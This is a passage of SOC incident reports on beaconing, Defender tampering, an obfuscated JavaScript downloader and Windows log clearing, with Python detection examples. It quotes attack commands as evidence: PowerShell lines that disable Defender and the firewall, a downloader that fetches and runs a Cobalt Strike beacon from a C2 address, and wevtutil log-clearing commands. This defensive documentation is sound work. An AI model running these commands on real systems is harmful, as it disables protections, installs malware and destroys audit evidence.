Primary Cause: Insecure file upload allowing PHP files.
Contributing Factors:
No file type validation on upload.
Upload endpoint publicly accessible without auth.
No WAF rules blocking web shells (until now).
6. Business Impact:
Operational Impact: Web server offline for 30 minutes.
Data Exposure: None (recon only).
Reputational Impact: None (contained quickly).
7. Remediation & Prevention:
Completed Actions:
Web shell removed.
Vulnerability patched.
Attacker IP blocked.
Technical Controls Enhanced:
Implemented file type validation on all uploads.
Added authentication to upload endpoints.
Deployed Imperva RASP for runtime web shell detection.
Created WAF rule to block web shell signatures.
8. Conclusion:
An attacker exploited an insecure file upload to place a PHP web shell on a public web server. They performed basic reconnaissance before Imperva detected and blocked the web shell. The file was removed, and the vulnerability patched. No data was accessed or exfiltrated.
Closure Rationale: Web shell removed; vulnerability patched; attacker blocked.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-18 11:30 EST
Batch 12: Defense Evasion & Command and Control Incident Reports
56. T1205 – Traffic Signaling (Darktrace Detection)
Darktrace Alert Details
**Alert ID:** DARKTRACE-TRAFFIC-SIG-1205-7842
**Alert Time:** 2024-02-19 09:30:22 EST
**Severity:** HIGH (85/100)
**Source:** Darktrace Enterprise Immune System
**Rule:** “Unusual Beaconing Pattern – Potential C2 Signaling”
**MITRE ATT&CK:** T1205 – Traffic Signaling
Alert Details:
Detection: Anomalous network traffic pattern consistent with C2 signaling
**Host:** DEV-WS-078 (Development Workstation)
**User:** alexchen (Alex Chen, Developer)
**Time:** 09:15-09:30 EST
Traffic Pattern Analysis:
Destination: 185.143.221[.]89:8443 (Bulgaria)
Protocol: HTTPS with custom certificate
Pattern: 12 connections at precise 60-second intervals
Packet sizes: Exactly 512 bytes each (consistent)
Timing: Jitter-free (not human)
Darktrace Anomaly Scoring:
Unusual External Destination: 85/100
Beaconing Behavior: 92/100
Packet Size Consistency: 88/100
Overall Threat Score: 88/100
Additional Context:
Host normally connects to US/EU only
No business need for Bulgaria connection
Connection started at 09:15, continues
Destination IP known for Cobalt Strike C2
Threat Intelligence:
IP 185.143.221[.]89 associated with TA577
Port 8443 (alternate HTTPS) commonly used by C2 to blend in with legitimate TLS traffic
Pattern matches “Malleable C2” profiles
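The traffic pattern above (fixed 60-second cadence, identical 512-byte packets, no jitter) scored from a connection log, as an added example that is not code from the report or from Darktrace. The log lines are constructed, and the five-field layout (time, source, destination, port, bytes) is an assumption rather than any vendor's export format.

```python
"""Added example, not code from the report: score per-destination connection
logs for the beaconing traits listed above. Regularity of the inter-connection
interval and of the packet size each contribute to a 0-100 score."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev


def parse_log(text):
    """Constructed layout: '<ISO time> <src> <dst> <port> <bytes>' per line."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, size = line.split()
        rows.append((datetime.fromisoformat(ts), src, dst, int(port), int(size)))
    return rows


def beacon_score(timestamps, sizes, min_connections=6, tolerance=0.3):
    """Return (score, detail). Zero interval jitter is worth 60 points, zero size
    variation 40; each decays linearly to 0 as its coefficient of variation reaches
    `tolerance`. Fewer than min_connections yields no score (one-off traffic)."""
    if len(timestamps) < min_connections:
        return 0, {}
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    avg_gap = mean(gaps)
    if avg_gap <= 0:
        return 0, {}
    interval_cv = pstdev(gaps) / avg_gap
    size_cv = pstdev(sizes) / mean(sizes)
    score = round(60 * max(0.0, 1 - interval_cv / tolerance)
                  + 40 * max(0.0, 1 - size_cv / tolerance))
    detail = {"connections": len(ts), "mean_interval_s": round(avg_gap, 1),
              "interval_cv": round(interval_cv, 3), "size_cv": round(size_cv, 3)}
    return score, detail


def find_beacons(rows, threshold=80):
    """Group connections by (src, dst, port) and return the groups scoring >= threshold."""
    groups = defaultdict(lambda: ([], []))
    for ts, src, dst, port, size in rows:
        groups[(src, dst, port)][0].append(ts)
        groups[(src, dst, port)][1].append(size)
    hits = {}
    for key, (times, sizes) in groups.items():
        score, detail = beacon_score(times, sizes)
        if score >= threshold:
            hits[key] = (score, detail)
    return hits


# Constructed log: 12 beacons at exact 60 s intervals (the alert's pattern) mixed
# with irregular browsing to a documentation host (203.0.113.10 is a test address).
BEACON_LINES = [f"2024-02-19T09:{15 + i:02d}:00 10.20.30.78 185.143.221[.]89 8443 512"
                for i in range(12)]
NORMAL_LINES = [
    "2024-02-19T09:15:07 10.20.30.78 203.0.113.10 443 1843",
    "2024-02-19T09:17:41 10.20.30.78 203.0.113.10 443 622",
    "2024-02-19T09:18:02 10.20.30.78 203.0.113.10 443 9120",
    "2024-02-19T09:22:55 10.20.30.78 203.0.113.10 443 431",
    "2024-02-19T09:23:10 10.20.30.78 203.0.113.10 443 2210",
    "2024-02-19T09:27:30 10.20.30.78 203.0.113.10 443 15020",
    "2024-02-19T09:29:03 10.20.30.78 203.0.113.10 443 777",
]
SAMPLE_LOG = "\n".join(BEACON_LINES + NORMAL_LINES)

if __name__ == "__main__":
    for (src, dst, port), (score, detail) in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}:{port} score={score} {detail}")
```

A Malleable C2 profile that adds sleep jitter spreads the intervals, so the interval term decays; lowering `tolerance` or alerting on the size term alone trades false positives for sensitivity, and that trade-off should be tuned on the host's own baseline.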
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Darktrace anomaly | Darktrace Console | Confirmed beaconing pattern to suspicious IP |
| 2. Process Investigation | Identify process making connections | CrowdStrike Falcon | svchost.exe with injected code (PID: 3421) |
| 3. Memory Analysis | Extract and analyze injected code | CrowdStrike Sandbox | Cobalt Strike beacon with custom sleep pattern |
| 4. Immediate Action | Isolate host | CrowdStrike | Host quarantined |
| 5. C2 Blocking | Block destination IP | Palo Alto Firewall | IP 185.143.221[.]89 blocked |
| 6. Threat Hunting | Check for same beacon pattern | Darktrace, Splunk | No other hosts with same pattern |
Jira Incident Report
**Ticket:** SOC-2024-096
**Summary:** T1205 – Cobalt Strike Beaconing Detected via Traffic Signaling
**Status:** RESOLVED
**Resolution:** MALICIOUS – C2 Communication Blocked
**Priority:** P2 – MEDIUM
**Labels:** T1205, traffic-signaling, beaconing, cobalt-strike, darktrace
**Components:** Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Unusual Beaconing Pattern – Potential C2 Signaling”.
Host: DEV-WS-078 (Development Department, user alexchen).
Time: 2024-02-19 09:30 EST.
Technique: MITRE ATT&CK T1205 – Traffic Signaling.
2. Technical Analysis:
Attack Chain:
08:45 – User clicked phishing link in email
08:46 – Malware downloaded and executed
08:47 – Malware injected into svchost.exe
09:15 – First C2 beacon after sleep interval
09:15-09:30 – 12 beacons at 60-second intervals
09:30 – Darktrace detects anomalous pattern
Beacon Analysis:
C2 IP: 185.143.221[.]89:8443
Protocol: HTTPS with custom certificate
Beacon Interval: Exactly 60 seconds (no jitter)
Packet Size: Exactly 512 bytes each
Pattern: Consistent, machine-generated (not human)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe (living off the land)
Sleep Pattern: Customizable in Malleable C2 profile
Capabilities: Keylogging, screenshot capture, file exfiltration
User Activity:
User clicked link in email about “code repository access”
Believed it was legitimate
No immediate signs of compromise
3. Investigation Findings:
Timeline:
08:45 – User clicks phishing link
08:46-08:47 – Malware installation
09:15 – Beaconing begins
09:30 – Darktrace alert
09:32 – SOC investigates
09:35 – Host isolated
09:36 – C2 IP blocked
Indicators of Compromise (IoCs):
Network:
– C2 IP: 185.143.221[.]89:8443
– Beacon Pattern: 60-second intervals, 512-byte packets
Process:
– svchost.exe (injected) – PID 3421
File:
– Initial dropper (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Isolated host via CrowdStrike.
Blocked C2 IP at firewall.
Terminated malicious svchost.exe process.
Scanned for persistence (none found).
Malware Removal:
Removed injected code from svchost.exe.
Deleted initial dropper.
Full scan (clean).
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No ASR rule blocking Office child processes.
PowerShell allowed to download and execute.
User lacked recent training.
6. Business Impact:
Operational Impact: Developer workstation offline for 2 hours.
Data Exposure: None (C2 contained before data exfil).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled the ASR rules “Block JavaScript or VBScript from launching downloaded executable content” and “Block execution of potentially obfuscated scripts”.
Enhanced Darktrace monitoring for beacon patterns (fixed-interval, fixed-size flows).
Deployed additional EDR detection for process injection.
8. Conclusion:
A developer clicked a phishing link, leading to Cobalt Strike infection. The malware established C2 beaconing with precise 60-second intervals. Darktrace detected the anomalous traffic pattern, enabling rapid containment before data exfiltration.
Closure Rationale: Malware removed; C2 blocked; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 10:30 EST
57. T1562 – Impair Defenses (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-DEFENSE-IMPAIR-1562-7842
Alert Time: 2024-02-19 14:15:33 EST
Severity: CRITICAL (95/100)
Source: Microsoft Defender for Endpoint
Rule: “Tampering with Defender Security Settings Detected”
MITRE ATT&CK: T1562.001 – Impair Defenses: Disable or Modify Tools
Alert Details:
Detection: Attempt to disable Windows Defender real-time protection
Host: IT-WS-112 (IT Department)
User: bjones (Brian Jones – IT Admin)
Time: 14:10 EST
PowerShell Commands Executed:
1. 14:08:22 – Set-MpPreference -DisableRealtimeMonitoring $true
2. 14:08:25 – Set-MpPreference -DisableBehaviorMonitoring $true
3. 14:08:28 – Set-MpPreference -DisableBlockAtFirstSeen $true
4. 14:08:31 – Set-MpPreference -DisableIOAVProtection $true
5. 14:08:34 – Set-MpPreference -DisablePrivacyMode $true
6. 14:08:37 – Set-MpPreference -MAPSReporting Disabled
7. 14:08:40 – Add-MpPreference -ExclusionPath C:\Users\bjones\AppData\Local\Temp
8. 14:08:43 – Add-MpPreference -ExclusionProcess malware.exe
9. 14:08:46 – Add-MpPreference -ExclusionExtension .exe
10. 14:08:49 – netsh advfirewall set allprofiles state off
Process Tree:
```
explorer.exe (PID: 2341)
  powershell.exe (PID: 4789)   <- executes the Set-MpPreference / Add-MpPreference commands above
    cmd.exe (PID: 4792)        <- netsh advfirewall set allprofiles state off
```
Detection Logic:
Multiple Defender disable commands in quick succession
Firewall disabled immediately after
User bjones is IT admin (legitimate access)
But pattern matches attacker disabling defenses
Additional Context:
bjones reported receiving “security alert” email 10 minutes prior
Clicked link, entered credentials
Account may be compromised
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed defense impairment attempts |
| 2. User Verification | Contact bjones | Teams, Phone | User did NOT run these commands; account compromised |
| 3. Immediate Action | Disable compromised account | Azure AD, AD | bjones account disabled |
| 4. Re-enable Defenses | Re-enable Defender settings | PowerShell, Intune | All protections restored |
| 5. Firewall Restore | Re-enable Windows Firewall | netsh, GPO | Firewall re-enabled |
| 6. Account Remediation | Reset password, enforce MFA | Azure AD | Password reset; MFA enforced |
Jira Incident Report
Ticket: SOC-2024-097
Summary: T1562 – Attempt to Disable Defender and Firewall via Compromised Admin Account
Status: RESOLVED
Resolution: MALICIOUS – Defenses Restored
Priority: P1 – CRITICAL
Labels: T1562, impair-defenses, defender-tampering, firewall, compromised-admin
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Tampering with Defender Security Settings Detected”.
Host: IT-WS-112 (IT Department, user bjones).
Time: 2024-02-19 14:15 EST.
Technique: MITRE ATT&CK T1562.001 – Impair Defenses: Disable or Modify Tools.
2. Technical Analysis:
Attack Chain:
13:55 – bjones receives phishing email “Security Alert – Action Required”
13:56 – Clicks link, enters credentials on fake Microsoft login page
13:57 – Attacker logs in from IP 45.134.225[.]78
14:00 – Attacker RDPs to IT-WS-112 using bjones credentials
14:05 – PowerShell launched to disable Defender
14:08 – Multiple Defender disable commands executed
14:09 – Windows Firewall disabled
14:10 – Defender detects tampering
14:15 – Alert triggers
Defenses Impaired:
Real-time monitoring: DISABLED
Behavior monitoring: DISABLED
Block at First Sight: DISABLED
Download and attachment scanning (IOAV): DISABLED
Privacy mode: DISABLED
Cloud-delivered protection (MAPS reporting): DISABLED
Exclusions added: Temp folder, .exe extension, malware.exe process
Windows Firewall: DISABLED (all profiles)
Note: with Tamper Protection enforced, Set-MpPreference changes to these settings are ignored; the fact that the settings had to be restored indicates it was not enforced on IT-WS-112.
Attacker Actions After Defense Impairment:
Downloaded Mimikatz to C:\Temp\
Attempted credential dumping (partially successful)
Created local admin account “helpdesk”
Scheduled task for persistence
Account Status:
bjones had Domain Admin privileges (over-privileged)
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
13:55 – Phishing email opened
13:56 – Credentials compromised
14:00-14:05 – Attacker RDP access
14:05-14:09 – Defenses disabled
14:10 – Defender detects tampering
14:15 – Alert triggers
14:17 – Account disabled
14:18 – Defenses restored
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 45.134.225[.]78
Account:
– bjones (compromised)
– helpdesk (local admin created)
Files:
– C:\Temp\mimikatz.exe (SHA256: b2c3d4e5…)
Scheduled Task:
– “WindowsMaintenance”
4. Containment Actions:
Immediate Actions:
Disabled bjones account.
Re-enabled all Defender protections.
Re-enabled Windows Firewall.
Removed attacker-created exclusions.
Deleted helpdesk account.
Removed scheduled task.
Blocked attacker IP.
Host Remediation:
Deleted Mimikatz and other tools.
Full scan (no other malware).
No reimage needed (cleaned).
Account Remediation:
Reset bjones password.
Enforced MFA.
Removed unnecessary admin privileges.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
User had excessive privileges (Domain Admin).
RDP allowed from internet.
6. Business Impact:
Operational Impact: IT admin offline for 2 hours.
Security Impact: Defenses down for 8 minutes.
Data Exposure: Some credentials may have been dumped; any account that had logged on to IT-WS-112 (including the bjones Domain Admin credential) should be treated as exposed and rotated.
7. Remediation & Prevention:
Completed Actions:
Defenses restored.
Compromised account secured.
Attacker artifacts removed.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved RDP behind VPN only.
Implemented Privileged Access Workstations.
Created alert for any Defender setting changes.
8. Conclusion:
An attacker compromised an IT admin via phishing and systematically disabled Windows Defender and the Windows Firewall. Defender for Endpoint detected the configuration changes and raised a tampering alert, enabling rapid restoration. Had Tamper Protection been enforced, the Set-MpPreference calls would have been ignored outright; since the settings had to be restored, it was not. The account was secured, and defenses were re-enabled within minutes.
Closure Rationale: Defenses restored; account secured; attacker blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 15:30 EST
58. T1027 – Obfuscated Files (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-OBFUSCATED-1027-7842
Alert Time: 2024-02-19 11:30:22 EST
Severity: HIGH (88/100)
Source: Fortinet FortiSandbox
Rule: “Obfuscated JavaScript Detected – Potential Malware Downloader”
MITRE ATT&CK: T1027.002 – Obfuscated Files or Information: Software Packing
Alert Details:
File Analysis Report:
File Name: invoice_7842.js
File Size: 124 KB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 (placeholder/truncated value; a full SHA-256 digest is 64 hex characters)
Source: Email attachment to user in Finance
Submission Time: 11:15 EST
Obfuscation Analysis:
File is heavily obfuscated JavaScript
Multiple layers of encoding:
Layer 1: Base64 encoded (detected)
Layer 2: XOR with key 0x42 (detected)
Layer 3: ROT13 (detected)
Layer 4: GZIP compressed (detected)
Layer 5: Final PowerShell script
Deobfuscated Content:
```powershell
$wc = New-Object System.Net.WebClient
$payload = $wc.DownloadData('http://185.143.221[.]89/beacon.bin')
$assembly = [System.Reflection.Assembly]::Load($payload)
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, (, [string[]] @()))
```
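The layer-peeling the sandbox performed, as an added example that is not part of the original report or of FortiSandbox: a sample blob is built by applying the four reported wrapping layers to the recovered downloader (kept defanged; nothing here touches the network), then stripped layer by layer without assuming the XOR key, and the final script is mined for URLs. The layer order, key 0x42 and the script text are from the page; the blob itself and the detection heuristics are constructed for the example.

```python
"""Peel the four wrapping layers the sandbox reported and pull IoCs from the recovered script."""
import base64
import codecs
import gzip
import re

# Innermost plaintext for the constructed sample: the downloader recovered on the page, kept defanged.
FINAL_STAGE = (
    "$wc = New-Object System.Net.WebClient\n"
    "$payload = $wc.DownloadData('http://185.143.221[.]89/beacon.bin')\n"
    "$assembly = [System.Reflection.Assembly]::Load($payload)\n"
    "$entryPoint = $assembly.EntryPoint\n"
    "$entryPoint.Invoke($null, (, [string[]] @()))\n"
).encode()

GZIP_MAGIC = b"\x1f\x8b"


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def rot13(data: bytes) -> bytes:
    """rot13 moves only ASCII letters, so it is its own inverse on arbitrary bytes."""
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")


def wrap_sample(script: bytes, key: int = 0x42) -> bytes:
    """Build a sample blob: gzip, then rot13, then XOR, then base64 (the sandbox's layers 4..1)."""
    return base64.b64encode(xor(rot13(gzip.compress(script, mtime=0)), key))


def peel(blob: bytes, max_layers: int = 8):
    """Strip recognisable layers until none applies; returns (layer names outermost first, final bytes)."""
    layers, data = [], blob
    for _ in range(max_layers):
        if data[:2] == GZIP_MAGIC:
            data = gzip.decompress(data)
            layers.append("gzip")
            continue
        stripped = b"".join(data.split())
        if stripped and len(stripped) % 4 == 0 and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", stripped):
            data = base64.b64decode(stripped, validate=True)
            layers.append("base64")
            continue
        # Single-byte XOR over a rot13'd gzip stream: the key is whatever maps the first byte to 0x1f,
        # and it is accepted only if the second byte then becomes 0x8b. No key needs to be known.
        if len(data) >= 2:
            key = data[0] ^ GZIP_MAGIC[0]
            if rot13(xor(data[:2], key)) == GZIP_MAGIC:
                data = rot13(xor(data, key))
                layers.append(f"xor(0x{key:02x})+rot13")
                continue
        break
    return layers, data


def extract_iocs(script: bytes):
    """URLs in the recovered script, including defanged [.] forms."""
    return sorted(set(re.findall(r"https?://[A-Za-z0-9.\[\]:/_-]+", script.decode("latin-1"))))


if __name__ == "__main__":
    layers, final = peel(wrap_sample(FINAL_STAGE))
    print(layers, extract_iocs(final))
```

The peeling loop stops when no layer is recognised, which is exactly the point at which a real sample should be handed to manual analysis; a layer the heuristics do not know (a different XOR width, a custom alphabet) leaves the intermediate bytes intact rather than corrupting them.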
Sandbox Behavior:
When executed, downloads Cobalt Strike beacon
Beacon connects to 185.143.221[.]89:443
Injects into legitimate process
Establishes persistence via scheduled task
Threat Score: 10/10 (Malicious)
Obfuscation: 10/10
Network Behavior: 10/10
Persistence: 8/10
Overall: 10/10 (Critical)
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify FortiSandbox analysis | FortiSandbox Console | Confirmed heavily obfuscated malicious JavaScript |
| 2. Email Investigation | Find email with attachment | Proofpoint, Exchange | Email to finance@company.com from spoofed vendor |
| 3. Quarantine Email | Block and remove email | Proofpoint | Email quarantined from all mailboxes |
| 4. User Check | Verify if user executed file | CrowdStrike | User did not open attachment (alert before execution) |
| 5. IOC Distribution | Block URLs and IPs | Palo Alto, Cisco Umbrella | URLs and IPs added to blocklists |
| 6. Threat Hunting | Check for similar files | FortiSandbox, Splunk | No other occurrences found |
Jira Incident Report
Ticket: SOC-2024-098
Summary: T1027 – Obfuscated JavaScript Malware Downloader in Email
Status: RESOLVED
Resolution: MALICIOUS – Blocked Before Execution
Priority: P2 – MEDIUM
Labels: T1027, obfuscated-files, javascript, fortisandbox, phishing
Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Obfuscated JavaScript Detected – Potential Malware Downloader”.
File: invoice_7842.js (email attachment).
Target: Finance Department.
Time: 2024-02-19 11:30 EST.
Technique: MITRE ATT&CK T1027.002 – Obfuscated Files or Information: Software Packing (as tagged by FortiSandbox; .002 covers binary packers, and layered encoding of a script maps more precisely to T1027.010 Command Obfuscation or T1027.013 Encrypted/Encoded File).
2. Technical Analysis:
Attack Chain:
11:10 – Email sent from “vendor@payment-update[.]net”
11:11 – Email delivered to finance@company.com
11:12 – Attachment submitted to FortiSandbox by the mail gateway (post-delivery; inline analysis was not yet enabled)
11:15 – Analysis begins
11:25 – Deobfuscation complete
11:28 – Malicious behavior confirmed
11:30 – Alert triggers
11:31 – Email quarantined (before user opened)
Obfuscation Layers:
Layer 1: Base64 encoding (conceals initial content)
Layer 2: XOR with key 0x42 (adds simple encryption)
Layer 3: ROT13 substitution (common obfuscation)
Layer 4: GZIP compression (hides patterns)
Layer 5: Final PowerShell downloader (payload)
Final Payload:
Downloads beacon.bin from 185.143.221[.]89
Loads as .NET assembly
Executes entry point (Cobalt Strike)
Connects to C2 on port 443
Email Details:
Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.js (masquerading as PDF)
3. Investigation Findings:
Timeline:
11:10 – Email sent
11:11 – Email delivered
11:12-11:28 – FortiSandbox analysis
11:30 – Alert triggers
11:31 – Email quarantined
11:32 – SOC investigates
11:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.js (SHA256: a1b2c3d4…)
Network:
– Download URL: http://185.143.221[.]89/beacon.bin
– C2: 185.143.221[.]89:443
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked URLs and IPs at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .js attachments.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending obfuscated malware via email.
Contributing Factors:
JavaScript attachments allowed (now blocked).
Sandbox analysis ran post-delivery, so the message sat in the mailbox for about 20 minutes before quarantine (delivered 11:11, quarantined 11:31); the user simply had not opened it yet.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all JavaScript attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for any obfuscated files.
8. Conclusion:
A sophisticated obfuscated JavaScript malware was delivered via email to the Finance department. FortiSandbox deobfuscated the multi-layer file, identified it as a Cobalt Strike downloader, and triggered an alert before the user could open it. No compromise occurred.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 12:30 EST
59. T1070 – Indicator Removal (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-LOG-CLEAR-1070-7842
Alert Time: 2024-02-19 16:30:45 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security
Rule: “Security Logs Cleared – Potential Cover-up”
MITRE ATT&CK: T1070.001 – Indicator Removal: Clear Windows Event Logs
Alert Details:
Correlated Events:
Windows Event ID 1102 (Security Log Cleared):
Time: 16:25 EST
Host: SEC-SRV-045 (Security Server)
User: SYSTEM (the subject of the 1102 event is the account that issued the clear, so wevtutil ran in a SYSTEM context rather than directly as the interactive user)
Log: Security
Details: “The audit log was cleared”
Windows Event ID 104 (System Log Cleared):
Time: 16:25:30 EST
Host: SEC-SRV-045
Log: System
Details: System log cleared
Windows Event ID 104 (Log Cleared, recorded in the System log with Channel = Windows PowerShell):
Time: 16:26 EST
Host: SEC-SRV-045
Log: Windows PowerShell
Details: Windows PowerShell log cleared (clearing any log other than Security produces ID 104 in the System log naming the cleared channel; there is no separate event ID for the PowerShell log)
Process Creation (Event ID 4688):
Time: 16:24 EST
Process: wevtutil.exe
Command: wevtutil cl Security & wevtutil cl System & wevtutil cl "Windows PowerShell"
Preceding Events (now cleared, recovered from forwarded logs):
16:20-16:23 – Multiple failed login attempts (RDP brute force)
16:23 – Successful login from 45.134.225[.]78
16:24 – wevtutil executed to clear logs
Detection Logic:
Multiple event logs cleared in quick succession
wevtutil executed by suspicious process
Preceding failed logins detected via forwarded logs
Pattern matches attacker covering tracks
Additional Context:
Host: Critical security server
Forwarded logs preserved in Splunk (not cleared)
Attacker unaware of centralized logging
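The Splunk correlation described above, as an added example that is not part of the original report: constructed copies of the forwarded events (4625 failures, the 4624 logon, the 4688 wevtutil process creation, and the 1102/104 clear events) are tied together by source IP and time window, and the cleared channels are read both from the clear events and from the wevtutil command line. The subject account on the clear events and the 02:00 svc_logrotate entry are assumptions, the latter included so that a routine maintenance clear with no preceding failures is not flagged.

```python
"""Correlation over forwarded Windows events: brute-force logon followed by log clearing."""
import re
from datetime import datetime


def _ev(hhmmss, event_id, **fields):
    return {"time": datetime.fromisoformat(f"2024-02-19T{hhmmss}"), "event_id": event_id, **fields}


# Constructed forwarded events for SEC-SRV-045 (assumed field values; see lead-in).
SAMPLE_EVENTS = [
    *[_ev(t, 4625, user=u, ip="45.134.225.78") for t, u in
      [("16:20:15", "admin"), ("16:20:45", "administrator"), ("16:21:15", "sec_admin"),
       ("16:21:45", "svc_monitor"), ("16:22:15", "backup_admin")]],
    _ev("16:23:00", 4624, user="jwilson", ip="45.134.225.78", logon_type=10),
    _ev("16:24:00", 4688, user="jwilson",
        command='wevtutil cl Security & wevtutil cl System & wevtutil cl "Windows PowerShell"'),
    _ev("16:25:00", 1102, user="jwilson", channel="Security"),
    _ev("16:25:30", 104, user="jwilson", channel="System"),
    _ev("16:26:00", 104, user="jwilson", channel="Windows PowerShell"),
    # Assumed nightly maintenance: a verbose channel cleared with no preceding logon failures.
    _ev("02:00:00", 104, user="svc_logrotate", channel="Microsoft-Windows-DNS-Client/Operational"),
]

CLEAR_RX = re.compile(r'wevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+("[^"]+"|\S+)', re.I)


def cleared_logs_from_cmdline(cmdline):
    """Names of the logs a wevtutil command line clears (handles chained '&' calls and quoted names)."""
    return [name.strip('"') for name in CLEAR_RX.findall(cmdline)]


def correlate_log_clearing(events, fail_window_s=600, min_failures=3, clear_window_s=900):
    """For each successful logon preceded by >= min_failures failures from the same source IP,
    collect the log-clear events (1102 for Security, 104 for other channels) and the wevtutil
    process creations that follow within clear_window_s seconds.
    Runs over forwarded copies, so the local clear does not remove the evidence it relies on."""
    events = sorted(events, key=lambda e: e["time"])
    findings = []
    for logon in (e for e in events if e["event_id"] == 4624):
        t = logon["time"]
        failures = [e for e in events if e["event_id"] == 4625 and e.get("ip") == logon.get("ip")
                    and 0 <= (t - e["time"]).total_seconds() <= fail_window_s]
        if len(failures) < min_failures:
            continue
        after = [e for e in events if 0 <= (e["time"] - t).total_seconds() <= clear_window_s]
        cleared = [e["channel"] for e in after if e["event_id"] in (1102, 104)]
        commanded = sorted({log for e in after if e["event_id"] == 4688
                            for log in cleared_logs_from_cmdline(e.get("command", ""))})
        if not cleared:
            continue
        findings.append({"source_ip": logon.get("ip"), "user": logon["user"], "logon_time": t,
                         "failed_users": [e["user"] for e in failures],
                         "cleared_channels": cleared, "commanded": commanded})
    return findings


if __name__ == "__main__":
    for f in correlate_log_clearing(SAMPLE_EVENTS):
        print(f["source_ip"], f["user"], f["failed_users"], f["cleared_channels"])
```

Reading the cleared channels from the 4688 command line as well as from the 1102/104 events is deliberate: the two lists should agree, and a mismatch (a channel named on the command line with no matching clear event, or the reverse) is itself a sign that forwarding was incomplete or that a second clearing method was used.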
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed log clearing events |
| 2. Recover Cleared Logs | Check forwarded logs | Splunk (forwarded) | Full activity recovered from Splunk |
| 3. Attacker Activity | Analyze recovered logs | Splunk Search | RDP brute force, successful login, log clearing |
| 4. Immediate Action | Isolate compromised host | CrowdStrike | SEC-SRV-045 quarantined |
| 5. Account Remediation | Reset affected user password | Azure AD, AD | Password reset; MFA enforced |
| 6. Threat Hunting | Check for other cleared logs | Splunk | No other log clearing events |
Jira Incident Report
Ticket: SOC-2024-099
Summary: T1070 – Attacker Clears Security Logs After RDP Brute Force
Status: RESOLVED
Resolution: MALICIOUS – Logs Recovered from Splunk
Priority: P2 – MEDIUM
Labels: T1070, indicator-removal, log-clearing, splunk, rdp-brute-force
Components: Log-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Security Logs Cleared – Potential Cover-up”.
Host: SEC-SRV-045 (Critical Security Server).
Time: 2024-02-19 16:30 EST.
Technique: MITRE ATT&CK T1070.001 – Indicator Removal: Clear Windows Event Logs.
2. Technical Analysis:
Attack Chain (Recovered from Splunk forwarded logs):
16:20:00 – First RDP connection attempt from 45.134.225[.]78 (user: admin)
16:20:15 – Failed login (wrong password)
16:20:30 – Second attempt (user: administrator)
16:20:45 – Failed
16:21:00 – Third attempt (user: sec_admin)
16:21:15 – Failed
16:21:30 – Fourth attempt (user: svc_monitor)
16:21:45 – Failed
16:22:00 – Fifth attempt (user: backup_admin)
16:22:15 – Failed
16:22:30 – Sixth attempt (user: jwilson)
16:23:00 – SUCCESS (credential later identified as Winter2024!, a seasonal password; Windows does not record the password itself in the logon event)
16:23:30 – Attacker enumerates system
16:24:00 – wevtutil.exe executed
16:24-16:26 – Logs cleared
16:30 – Splunk alert triggers
Compromised Account:
